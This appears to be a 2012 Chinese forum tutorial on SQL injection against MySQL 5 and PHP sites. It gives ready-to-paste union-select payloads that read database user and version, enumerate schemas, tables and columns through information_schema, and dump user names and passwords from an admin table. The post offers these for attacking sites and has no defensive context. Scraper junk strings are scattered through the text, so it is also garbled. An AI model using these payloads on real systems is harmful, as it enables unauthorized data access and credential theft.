" F7 |0 M; s8 p$ L1 D8 O( {, z
教程内容:Mysql 5+php 注入
( c7 y$ ?8 l9 j( E2 t6 x; ~5 K2 Y2 ]% ~: X9 `
+ x$ y/ O' \1 L
# Z8 j/ N8 o; ]6 [一.查看MYSQL基本信息(库名,版本,用户)
7 M7 V L& V8 D0 A
1 U* S& T% ~. `1 pand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/** N4 ~4 m* o6 e3 k3 o2 L
' J9 |' C0 Z Y& h. Y
二.查数据库
; L n/ _& w3 s6 P
D" b; p/ B# O) }and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*3 k6 z0 h e) l# Y0 ?& K
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。4 H; {0 d( I' |% H/ Z) D9 B
8 \) Y8 ]- n. E( f; D( w/ O7 d三.暴表. j9 k V* ]' O: A6 e* i" O
. @( X' {# P. ]5 I1 e t0 x$ r) A5 {; Hand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/** `7 _) Q' @. u* E5 _
/ h' ^9 a' ?; k3 O* n! W+ y
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
! K1 Q; c# W6 X5 Y% q. I7 @; [9 H5 @& m/ K3 M
四.暴字段+ `' j1 j1 a& [& Z: j
2 h# c: Y @- O' k% j$ d3 {and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
8 D% Q" ?3 S3 m( L4 D: k- w: V: R$ S) g3 J V
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。% l% R/ A; g$ o4 _ i( g: B/ d
0 j& V6 b3 c! }$ E4 [
五.暴数据
5 O6 `& I+ @7 [/ b8 b! `
; J2 Y; b- G6 H- \1 Y% {and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*7 L: R* i- f1 j: }% M
: ]& ]1 v8 ^2 \8 e5 g8 c# I6 v/ e
. e6 T; G2 i; q* [: i1 {这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。1 ?7 }# Q) `" c( J* e d5 p& l' E3 w
|
发表于 2012-9-13 16:27:53
收藏
支持
反对